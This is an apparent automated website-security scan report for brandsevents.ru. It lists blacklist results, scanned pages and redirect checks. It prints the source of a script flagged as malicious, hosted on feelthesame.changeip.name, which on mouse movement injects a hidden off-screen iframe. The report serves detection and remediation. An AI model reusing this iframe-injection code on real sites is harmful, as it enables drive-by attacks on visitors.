Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brandsevents.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brandsevents.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://brandsevents.ru/ | 200 OK Content-Length: 13837 Content-Type: text/html | clean |
http://brandsevents.ru/t3-assets/js_fea69.js | 200 OK Content-Length: 300837 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js | 200 OK Content-Length: 95786 Content-Type: text/javascript | clean |
http://brandsevents.ru/t3-assets/js_6890a.js | 200 OK Content-Length: 82612 Content-Type: application/x-javascript | clean |
http://www.bitstorm.org/jquery/color-animation/jquery.animate-colors-min.js | 200 OK Content-Length: 2756 Content-Type: application/x-javascript | clean |
http://brandsevents.ru/index.php/how | 200 OK Content-Length: 10660 Content-Type: text/html | clean |
http://feelthesame.changeip.name/rsize.js | 200 OK Content-Length: 405 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) res='ÐÑибка MySQL'; var astatf = 0; document.write("<head></head><b><div id='staticaccoin'></div></b>"); document.onmousemove=moveonlinetest; function moveonlinetest() { if (astatf == 0) { astatf++; text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>"; document.getElementById("staticaccoin").innerHTML = text }} Antivirus reports:
| ||
http://brandsevents.ru/index.php/projects | 200 OK Content-Length: 23473 Content-Type: text/html | clean |
http://brandsevents.ru/index.php/contacts | 200 OK Content-Length: 11375 Content-Type: text/html | clean |
http://brandsevents.ru/index.php/ | 200 OK Content-Length: 13912 Content-Type: text/html | clean |
http://brandsevents.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://brandsevents.ru/index.php/projects/98-kadetball | 200 OK Content-Length: 13911 Content-Type: text/html | clean |
http://brandsevents.ru/index.php/projects/ | 200 OK Content-Length: 23531 Content-Type: text/html | clean |
http://brandsevents.ru/index.php/projects/114-debatenight | 200 OK Content-Length: 11565 Content-Type: text/html | clean |
http://brandsevents.ru/index.php/projects/124-hackaton | 200 OK Content-Length: 12153 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brandsevents.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 10 Sep 2014 00:02:32 GMT
ETag: 96d6d64c2c2715b05c02716cfe7c64d3
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Last-Modified: Tue, 09 Sep 2014 21:05:07 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0a51dcb219f2d04141d5410667b71f70=7bbe8bc696f4249c9b9d9256bb893093; path=/
Set-Cookie: ja_puresite_tpl=ja_puresite; expires=Mon, 31-Aug-2015 00:02:32 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: brandsevents.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 10 Sep 2014 00:02:32 GMT
ETag: 96d6d64c2c2715b05c02716cfe7c64d3
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Last-Modified: Tue, 09 Sep 2014 21:05:07 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0a51dcb219f2d04141d5410667b71f70=7bbe8bc696f4249c9b9d9256bb893093; path=/
Set-Cookie: ja_puresite_tpl=ja_puresite; expires=Mon, 31-Aug-2015 00:02:32 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: brandsevents.ru
Referer: http://www.google.com/search?q=brandsevents.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: brandsevents.ru
Referer: http://www.google.com/search?q=brandsevents.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.